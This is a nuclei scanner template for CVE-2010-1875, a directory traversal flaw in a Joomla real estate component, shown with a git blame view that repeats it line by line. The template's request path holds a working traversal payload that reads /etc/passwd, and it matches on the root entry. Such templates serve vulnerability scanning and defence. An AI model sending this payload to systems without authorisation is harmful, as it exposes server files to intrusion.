nuclei-templates/cves/2010/CVE-2010-1875.yaml

id: CVE-2010-1875

info:
  name: Joomla! Component Property - Local File Inclusion
  author: daffainfo
  severity: high
  description: A directory traversal vulnerability in the Real Estate Property (com_properties) component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
  reference:
    - https://www.exploit-db.com/exploits/11851
    - https://www.cvedetails.com/cve/CVE-2010-1875
  tags: cve,cve2010,joomla,lfi
  classification:
    cve-id: CVE-2010-1875
requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200

# Enhanced by mp on 2022/03/16
Create CVE-2010-1875.yaml 2021-08-18 10:51:05 +00:00			`id: CVE-2010-1875`
Dashboard Text Enhancements (#3927) Dashboard text enhancements 2022-03-17 17:01:45 +00:00
Create CVE-2010-1875.yaml 2021-08-18 10:51:05 +00:00			`info:`
			`name: Joomla! Component Property - Local File Inclusion`
			`author: daffainfo`
			`severity: high`
Dashboard Content Enhancements (#3711) * Enhancement: cves/2010/CVE-2010-1353.yaml by mp * Enhancement: cves/2010/CVE-2010-1352.yaml by mp * Enhancement: cves/2010/CVE-2010-1345.yaml by mp * Enhancement: cves/2010/CVE-2010-1340.yaml by mp * Enhancement: cves/2010/CVE-2010-1345.yaml by mp * Enhancement: cves/2010/CVE-2010-1315.yaml by mp * Enhancement: cves/2010/CVE-2010-1314.yaml by mp * Enhancement: cves/2010/CVE-2010-1313.yaml by mp * Enhancement: cves/2010/CVE-2010-1312.yaml by mp * Enhancement: cves/2010/CVE-2010-1308.yaml by mp * Enhancement: cves/2010/CVE-2010-1307.yaml by mp * Enhancement: cves/2010/CVE-2010-1306.yaml by mp * Enhancement: cves/2010/CVE-2010-1305.yaml by mp * Enhancement: cves/2010/CVE-2010-1304.yaml by mp * Enhancement: cves/2010/CVE-2010-1302.yaml by mp * Enhancement: cves/2010/CVE-2010-1219.yaml by mp * Enhancement: cves/2010/CVE-2010-1352.yaml by mp * Enhancement: cves/2010/CVE-2010-1354.yaml by mp * Enhancement: cves/2010/CVE-2010-1461.yaml by mp * Enhancement: cves/2010/CVE-2010-1469.yaml by mp * Enhancement: cves/2010/CVE-2010-1470.yaml by mp * Enhancement: cves/2010/CVE-2010-1471.yaml by mp * Enhancement: cves/2010/CVE-2010-1472.yaml by mp * Enhancement: cves/2010/CVE-2010-1473.yaml by mp * Enhancement: cves/2010/CVE-2010-1474.yaml by mp * Enhancement: cves/2010/CVE-2010-1475.yaml by mp * Enhancement: cves/2010/CVE-2010-1476.yaml by mp * Enhancement: cves/2010/CVE-2010-1478.yaml by mp * Enhancement: cves/2010/CVE-2010-1491.yaml by mp * Enhancement: cves/2010/CVE-2010-1494.yaml by mp * Enhancement: cves/2010/CVE-2010-1495.yaml by mp * Enhancement: cves/2010/CVE-2010-1531.yaml by mp * Enhancement: cves/2010/CVE-2010-1473.yaml by mp * Enhancement: misconfiguration/proxy/metadata-alibaba.yaml by cs * Enhancement: misconfiguration/proxy/metadata-openstack.yaml by cs * Enhancement: misconfiguration/proxy/metadata-oracle.yaml by cs * Enhancement: cves/2016/CVE-2016-4975.yaml by cs * Enhancement: misconfiguration/proxy/metadata-openstack.yaml by cs * Enhancement: misconfiguration/proxy/metadata-oracle.yaml by cs * Enhancement: misconfiguration/proxy/metadata-openstack.yaml by cs * Enhancement: misconfiguration/proxy/metadata-digitalocean.yaml by cs * Enhancement: misconfiguration/proxy/metadata-alibaba.yaml by cs * Enhancement: misconfiguration/proxy/metadata-hetzner.yaml by cs * Enhancement: misconfiguration/proxy/metadata-aws.yaml by cs * Enhancement: misconfiguration/proxy/metadata-google.yaml by cs * Enhancement: misconfiguration/proxy/metadata-azure.yaml by cs * Enhancement: misconfiguration/proxy/open-proxy-localhost.yaml by cs * Enhancement: misconfiguration/proxy/open-proxy-internal.yaml by cs * Enhancement: cves/2021/CVE-2021-1497.yaml by cs * Spacing fixes and enhancement to CNVD-2019-01348.yaml * Spacing fixes, and enhancement to CNVD-2019-01348.yaml * Merge artifact * Spacing * Minor tags cleanup * Enhancement: cves/2010/CVE-2010-1532.yaml by mp * Enhancement: cves/2010/CVE-2010-1533.yaml by mp * Enhancement: cves/2010/CVE-2010-1534.yaml by mp * Enhancement: cves/2010/CVE-2010-1535.yaml by mp * Enhancement: cves/2010/CVE-2010-1540.yaml by mp * Enhancement: cves/2010/CVE-2010-1601.yaml by mp * Enhancement: cves/2010/CVE-2010-1602.yaml by mp * Enhancement: cves/2010/CVE-2010-1603.yaml by mp * Enhancement: cves/2010/CVE-2010-1607.yaml by mp * Enhancement: cves/2010/CVE-2010-1653.yaml by mp * Enhancement: cves/2010/CVE-2010-1657.yaml by mp * Enhancement: cves/2010/CVE-2010-1657.yaml by mp * Enhancement: cves/2010/CVE-2010-1658.yaml by mp * Enhancement: cves/2010/CVE-2010-1659.yaml by mp * Enhancement: cves/2010/CVE-2010-1714.yaml by mp * Enhancement: cves/2010/CVE-2010-1715.yaml by mp * Enhancement: cves/2010/CVE-2010-1532.yaml by mp * Enhancement: cves/2010/CVE-2010-1533.yaml by mp * Enhancement: cves/2010/CVE-2010-1534.yaml by mp * Enhancement: cves/2010/CVE-2010-1534.yaml by mp * Enhancement: cves/2010/CVE-2010-1535.yaml by mp * Enhancement: cves/2010/CVE-2010-1540.yaml by mp * Enhancement: cves/2010/CVE-2010-1540.yaml by mp * Enhancement: cves/2010/CVE-2010-1717.yaml by mp * Enhancement: cves/2010/CVE-2010-1718.yaml by mp * Enhancement: cves/2010/CVE-2010-1719.yaml by mp * Enhancement: cves/2010/CVE-2010-1722.yaml by mp * Enhancement: cves/2010/CVE-2010-1723.yaml by mp * Enhancement: cves/2010/CVE-2010-1858.yaml by mp * Enhancement: cves/2010/CVE-2010-1873.yaml by mp * Enhancement: cves/2010/CVE-2010-1870.yaml by mp * Enhancement: cves/2010/CVE-2010-1875.yaml by mp * Enhancement: cves/2010/CVE-2010-1878.yaml by mp * Enhancement: cves/2010/CVE-2010-1952.yaml by mp * Enhancement: cves/2010/CVE-2010-1953.yaml by mp * Enhancement: cves/2010/CVE-2010-1954.yaml by mp * Enhancement: cves/2010/CVE-2010-1955.yaml by mp * Enhancement: cves/2010/CVE-2010-1956.yaml by mp * Information Enhancements Co-authored-by: sullo <sullo@cirt.net> 2022-02-15 22:47:54 +00:00			`description: A directory traversal vulnerability in the Real Estate Property (com_properties) component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.`
Removed pipe (\|) character from references, because the structure requires it to be a string slice, not a string Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-19 13:59:12 +00:00			`reference:`
Create CVE-2010-1875.yaml 2021-08-18 10:51:05 +00:00			`- https://www.exploit-db.com/exploits/11851`
			`- https://www.cvedetails.com/cve/CVE-2010-1875`
			`tags: cve,cve2010,joomla,lfi`
Dashboard Content Enhancements (#3711) * Enhancement: cves/2010/CVE-2010-1353.yaml by mp * Enhancement: cves/2010/CVE-2010-1352.yaml by mp * Enhancement: cves/2010/CVE-2010-1345.yaml by mp * Enhancement: cves/2010/CVE-2010-1340.yaml by mp * Enhancement: cves/2010/CVE-2010-1345.yaml by mp * Enhancement: cves/2010/CVE-2010-1315.yaml by mp * Enhancement: cves/2010/CVE-2010-1314.yaml by mp * Enhancement: cves/2010/CVE-2010-1313.yaml by mp * Enhancement: cves/2010/CVE-2010-1312.yaml by mp * Enhancement: cves/2010/CVE-2010-1308.yaml by mp * Enhancement: cves/2010/CVE-2010-1307.yaml by mp * Enhancement: cves/2010/CVE-2010-1306.yaml by mp * Enhancement: cves/2010/CVE-2010-1305.yaml by mp * Enhancement: cves/2010/CVE-2010-1304.yaml by mp * Enhancement: cves/2010/CVE-2010-1302.yaml by mp * Enhancement: cves/2010/CVE-2010-1219.yaml by mp * Enhancement: cves/2010/CVE-2010-1352.yaml by mp * Enhancement: cves/2010/CVE-2010-1354.yaml by mp * Enhancement: cves/2010/CVE-2010-1461.yaml by mp * Enhancement: cves/2010/CVE-2010-1469.yaml by mp * Enhancement: cves/2010/CVE-2010-1470.yaml by mp * Enhancement: cves/2010/CVE-2010-1471.yaml by mp * Enhancement: cves/2010/CVE-2010-1472.yaml by mp * Enhancement: cves/2010/CVE-2010-1473.yaml by mp * Enhancement: cves/2010/CVE-2010-1474.yaml by mp * Enhancement: cves/2010/CVE-2010-1475.yaml by mp * Enhancement: cves/2010/CVE-2010-1476.yaml by mp * Enhancement: cves/2010/CVE-2010-1478.yaml by mp * Enhancement: cves/2010/CVE-2010-1491.yaml by mp * Enhancement: cves/2010/CVE-2010-1494.yaml by mp * Enhancement: cves/2010/CVE-2010-1495.yaml by mp * Enhancement: cves/2010/CVE-2010-1531.yaml by mp * Enhancement: cves/2010/CVE-2010-1473.yaml by mp * Enhancement: misconfiguration/proxy/metadata-alibaba.yaml by cs * Enhancement: misconfiguration/proxy/metadata-openstack.yaml by cs * Enhancement: misconfiguration/proxy/metadata-oracle.yaml by cs * Enhancement: cves/2016/CVE-2016-4975.yaml by cs * Enhancement: misconfiguration/proxy/metadata-openstack.yaml by cs * Enhancement: misconfiguration/proxy/metadata-oracle.yaml by cs * Enhancement: misconfiguration/proxy/metadata-openstack.yaml by cs * Enhancement: misconfiguration/proxy/metadata-digitalocean.yaml by cs * Enhancement: misconfiguration/proxy/metadata-alibaba.yaml by cs * Enhancement: misconfiguration/proxy/metadata-hetzner.yaml by cs * Enhancement: misconfiguration/proxy/metadata-aws.yaml by cs * Enhancement: misconfiguration/proxy/metadata-google.yaml by cs * Enhancement: misconfiguration/proxy/metadata-azure.yaml by cs * Enhancement: misconfiguration/proxy/open-proxy-localhost.yaml by cs * Enhancement: misconfiguration/proxy/open-proxy-internal.yaml by cs * Enhancement: cves/2021/CVE-2021-1497.yaml by cs * Spacing fixes and enhancement to CNVD-2019-01348.yaml * Spacing fixes, and enhancement to CNVD-2019-01348.yaml * Merge artifact * Spacing * Minor tags cleanup * Enhancement: cves/2010/CVE-2010-1532.yaml by mp * Enhancement: cves/2010/CVE-2010-1533.yaml by mp * Enhancement: cves/2010/CVE-2010-1534.yaml by mp * Enhancement: cves/2010/CVE-2010-1535.yaml by mp * Enhancement: cves/2010/CVE-2010-1540.yaml by mp * Enhancement: cves/2010/CVE-2010-1601.yaml by mp * Enhancement: cves/2010/CVE-2010-1602.yaml by mp * Enhancement: cves/2010/CVE-2010-1603.yaml by mp * Enhancement: cves/2010/CVE-2010-1607.yaml by mp * Enhancement: cves/2010/CVE-2010-1653.yaml by mp * Enhancement: cves/2010/CVE-2010-1657.yaml by mp * Enhancement: cves/2010/CVE-2010-1657.yaml by mp * Enhancement: cves/2010/CVE-2010-1658.yaml by mp * Enhancement: cves/2010/CVE-2010-1659.yaml by mp * Enhancement: cves/2010/CVE-2010-1714.yaml by mp * Enhancement: cves/2010/CVE-2010-1715.yaml by mp * Enhancement: cves/2010/CVE-2010-1532.yaml by mp * Enhancement: cves/2010/CVE-2010-1533.yaml by mp * Enhancement: cves/2010/CVE-2010-1534.yaml by mp * Enhancement: cves/2010/CVE-2010-1534.yaml by mp * Enhancement: cves/2010/CVE-2010-1535.yaml by mp * Enhancement: cves/2010/CVE-2010-1540.yaml by mp * Enhancement: cves/2010/CVE-2010-1540.yaml by mp * Enhancement: cves/2010/CVE-2010-1717.yaml by mp * Enhancement: cves/2010/CVE-2010-1718.yaml by mp * Enhancement: cves/2010/CVE-2010-1719.yaml by mp * Enhancement: cves/2010/CVE-2010-1722.yaml by mp * Enhancement: cves/2010/CVE-2010-1723.yaml by mp * Enhancement: cves/2010/CVE-2010-1858.yaml by mp * Enhancement: cves/2010/CVE-2010-1873.yaml by mp * Enhancement: cves/2010/CVE-2010-1870.yaml by mp * Enhancement: cves/2010/CVE-2010-1875.yaml by mp * Enhancement: cves/2010/CVE-2010-1878.yaml by mp * Enhancement: cves/2010/CVE-2010-1952.yaml by mp * Enhancement: cves/2010/CVE-2010-1953.yaml by mp * Enhancement: cves/2010/CVE-2010-1954.yaml by mp * Enhancement: cves/2010/CVE-2010-1955.yaml by mp * Enhancement: cves/2010/CVE-2010-1956.yaml by mp * Information Enhancements Co-authored-by: sullo <sullo@cirt.net> 2022-02-15 22:47:54 +00:00			`classification:`
			`cve-id: CVE-2010-1875`
Create CVE-2010-1875.yaml 2021-08-18 10:51:05 +00:00			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00"`
			`matchers-condition: and`
			`matchers:`
			`- type: regex`
			`regex:`
			`- "root:.*:0:0"`
			`- type: status`
			`status:`
			`- 200`
Dashboard Text Enhancements (#3927) Dashboard text enhancements 2022-03-17 17:01:45 +00:00
			`# Enhanced by mp on 2022/03/16`